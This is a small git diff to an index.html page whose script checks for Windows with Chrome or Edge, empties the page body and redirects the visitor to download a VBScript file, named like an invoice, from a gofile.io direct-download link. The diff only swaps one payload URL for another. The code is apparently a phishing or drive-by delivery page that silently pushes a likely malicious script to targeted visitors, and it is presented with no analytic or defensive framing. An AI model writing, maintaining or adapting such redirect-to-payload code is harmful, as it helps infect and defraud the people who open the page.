--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store-eu-par-1.gofile.io/download/direct/983cb3aa-ead7-4107-ba0a-be222bba2a23/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://store5.gofile.io/download/direct/387112c5-6b97-488c-b892-ae2df6a2e646/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
